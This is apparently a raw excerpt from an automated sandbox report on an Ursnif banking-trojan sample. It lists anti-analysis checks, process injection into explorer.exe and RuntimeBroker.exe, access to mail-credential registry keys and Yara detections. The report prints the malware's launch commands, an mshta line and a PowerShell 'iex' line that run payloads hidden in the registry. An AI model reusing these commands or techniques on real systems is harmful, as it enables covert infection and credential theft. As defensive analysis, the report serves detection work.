            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            Source: C:\Windows\System32\control.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1687
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3825
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.dllJump to dropped file
            Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\earmark.avchdJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.dllJump to dropped file
            Source: C:\Windows\System32\wscript.exe TID: 6784Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3488Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1380Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1324Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformation
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
            Source: C:\Windows\explorer.exeCode function: 35_2_061037B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,
            Source: explorer.exe, 00000023.00000000.372098959.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000023.00000000.372098959.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
            Source: wscript.exe, 00000000.00000002.244679778.0000024A2A2D0000.00000002.00000001.sdmp, explorer.exe, 00000023.00000000.371555373.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 00000023.00000000.371822048.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: RuntimeBroker.exe, 00000025.00000000.381827183.000001FC1125D000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: wscript.exe, 00000000.00000002.242795493.0000024A25602000.00000004.00000001.sdmpBinary or memory string: oJBgbwWaQeZwTVVJvLfbUPfDcZuDtMhTCBaqPtPhTOfKtCMDIbDUZCTywxngHJTwWeNgJfrKBxxlRfNTsnRkOMyqvwjLPEtBFrXHVveCHXVtcXJAAtkJPUvMArNRuFjPNkfdupLoGWHadbQHEpTiqSSvuXBDfZsWWhPPYtKMtwwaVbWBGXlvmFkVBhUCrXehuqWKifcLstbkFsNqrmUgCMyFOyMpxWqhsPekWlUXTBVNgvtyqRhbyfkplVKGqyWRFtbUYFIhyjUUJlEODkjhltlKxsciubKsZbcicZwSPeloYrczVFauIsqApiBlUIlEMNwmaRhCkQWNGIuXfLyInNnPyBKDMZZcNPKfUmyxFGlzuDjjJpxkvRJUONpBRLRSmBnhIbTGPhmgZZEdcxCYJtWdiqzGgIvTNCDNamrvpCVgCHNGhalGlGxoLVaneRqiwrvWGZYKNBrQPMDJbmAvFryrRoIqSApXSzZxFmkbEVhxZOXjkBXSisfYZOzfbwGivGrraPVfgiNKuvOwKPJynEqeNHcpdMCRDmVAQjsQCGvhwcGSXLyhhHyDmTbimpaDnlIyqhVlXgAZwDrmBiAoplSCcMpbnilIHGuceLqdTZzEaIkXOvRgwaPAYakFOBwnLKimDlBeJUZkdgpbTQXnKBzpddPwsuXdKQgleCdZdhdSMTeNggoszaCNSznnKVKUYGIIbSLHlGRckOUQeiDlRbobDAsnXYCTwgqwLrFGobpnrIhUnojqqaIEYHymxrmvqCrVOuGzuwOXhzAOfjcEXkmwOCLfjyCLMizufSqJxORIkRcvdxUamoPIpoVTdpjYjcxvVDETeJGJfFOTXuOhDcwJgHMsyUvyhCcbvzVrMWjAOtWrTQqhwRXOvxiUhLDkYQDTITShEkpiWQaTvLGRhvnQnMHTTRKDrpEYGuGmIBQwGNrcOLaVBrTedpKPunWRCtOLEYaKtdBkswHuMXQdcmMzudiJqcihTrROOKjdirjTOCEhqZHBQjXpWpIvVMdxYtbLekwYhwqavNAWwdiCelIsXWJTPZkWIdfkfxwCXftctoKEYPEfLfLhYHfmKcrxUFxAnYqVDwowkCyWcgwipaCgHEPkgnNMAQLPzzJfRTTgOmrHntCSGMEIBqNmnrkzfrThqqIcWthgzODAxwAncIZGaFUdyzVPHekyYdGkWpMdxMFmLSfwkbyIBYDGFtwAliNGHSuMeDTLyFkKOWbNLWaZmfkRnPlseVMVQDrXVVPOrFGbzRgeRnCPgYNdoMGozwNLFvjaxBiuQCbMgPndMjXoZXlCygjaCGoMuPSwBqAUjKrRHOoymuaaESVTaVhgnQlSxTMajPUYVuWhMexpAxDRDclMqxYPyucleWcWfYCymGcvVeWkCoxyHeAFhqYGsNpjmyYExVAAGRNQzasIYIYzTumMvJoNeVSXQjCeqjoaIOVuMwmqBXMoulHMXukoqqvBWfUMhKzrBdLRTCRMxhiskOZDYbPKdUPJHfGhLdoJIPIGGnNvqeWgJCPJhcjzreQoayckqzXtQirWCzTQFzcmqhrfIptgHVAuENTTUchEBHAWAtKqZJpOzKBQyTtlKyCELYxjrOMKwhFZfUTEcujkSRMsnASxcOQCzzvmPvEjbRtWuHygwpQCvqtTxxfLzapckYQWfDhUvRxyvzvbRYGyNehlCzpjvzchGQDCyhRYpUFrwBFhYtqMkHtXnYAvNxmnPlcgiQsXZREykSiDodqwdxyMJMfQjolicHjenTVyrCCPhfhusGoiNGgoLgFqLsMnzzRuvYGOvoQxTYBCqyhDjUHCNPlCGqIcIZOIsLvQLuBKcJINqEofYfUWVMChSmpdwSilKRaTYGUTEQDuSoNgJHRCYEYeXuGyBNXGMCOfURPAmpteMZOXkbYEpNtVCItvVRLsuWNfgPQMzpbewlBvPbwKsfYKojruwDArnkFEGbGbQvPfEMjJgmwhwPlGLyMKFDRXKpHGfStYcKkqBOJmklXzQzxXOzEWbOHq
            Source: explorer.exe, 00000023.00000000.366784203.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
            Source: explorer.exe, 00000023.00000000.372098959.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
            Source: explorer.exe, 00000023.00000000.372098959.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000023.00000000.372194462.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
            Source: explorer.exe, 00000023.00000002.486262373.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
            Source: wscript.exe, 00000000.00000003.208159693.0000024A2720B000.00000004.00000001.sdmpBinary or memory string: VRLsuWNfgPQMzpbewlBvPbwKsfYKojruwDArnkFEGbGbQvPfEMjJgmwhwPlGLyMKFDRXKpHGfStYcKkqBOJmklXzQzxXOzEWbOHq
            Source: wscript.exe, 00000000.00000002.244679778.0000024A2A2D0000.00000002.00000001.sdmp, explorer.exe, 00000023.00000000.371555373.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.244679778.0000024A2A2D0000.00000002.00000001.sdmp, explorer.exe, 00000023.00000000.371555373.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: explorer.exe, 00000023.00000002.485070309.0000000004E61000.00000004.00000001.sdmpBinary or memory string: Prod_VMware_SATAw
            Source: wscript.exe, 00000000.00000002.244679778.0000024A2A2D0000.00000002.00000001.sdmp, explorer.exe, 00000023.00000000.371555373.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: earmark.avchd.0.drJump to dropped file
            Allocates memory in foreign processesShow sources
            Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 177641C0000 protect: page execute and read and write
            Changes memory attributes in foreign processes to executable or writableShow sources
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute read
            Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFB736E1580 protect: page execute and read and write
            Compiles code for process injection (via .Net compiler)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.0.csJump to dropped file
            Creates a thread in another existing process (thread injection)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 736E1580
            Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 736E1580
            Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 736E1580
            Source: C:\Windows\explorer.exeThread created: unknown EIP: 736E1580
            Source: C:\Windows\explorer.exeThread created: unknown EIP: 736E1580
            Injects code into the Windows Explorer (explorer.exe)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3388 base: 10C0000 value: 00
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3388 base: 7FFB736E1580 value: EB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3388 base: 14D0000 value: 80
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3388 base: 7FFB736E1580 value: 40
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
            Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3388
            Source: C:\Windows\explorer.exeThread register set: target process: 3668
            Source: C:\Windows\explorer.exeThread register set: target process: 4376
            Source: C:\Windows\explorer.exeThread register set: target process: 4588
            Source: C:\Windows\explorer.exeThread register set: target process: 5912
            Writes to foreign memory regionsShow sources
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 10C0000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFB736E1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 14D0000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFB736E1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 6E40FFD000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 29233F0000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 177641C0000
            Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3556.tmp' 'c:\Users\user\AppData\Local\Temp\1b1iaete\CSC8D8F05B01A304F97BCE9A6F7324A364.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES45E1.tmp' 'c:\Users\user\AppData\Local\Temp\gf33rpcq\CSC37B7B5B8D8A1469384B4E042B687670.TMP'
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: explorer.exe, 00000023.00000000.358164876.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
            Source: explorer.exe, 00000023.00000002.472973011.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.473076491.000001FC11790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.472576005.0000017764860000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000023.00000000.368432531.0000000006860000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.473076491.000001FC11790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.472576005.0000017764860000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000023.00000002.472973011.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.473076491.000001FC11790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.472576005.0000017764860000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000023.00000002.472973011.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.473076491.000001FC11790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000002.472576005.0000017764860000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.235004244.0000024A27253000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.233631914.0000024A27257000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.342326677.00000000046E0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270925261.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271044990.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.283759695.000000000530B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270893136.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271117901.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270863314.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270967614.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271019633.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271092585.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.384731401.00000000059A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6356, type: MEMORY
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.342326677.00000000046E0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270925261.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271044990.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.283759695.000000000530B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270893136.0000000005488000.00000004.00000040.sdmp, type: MEMORY
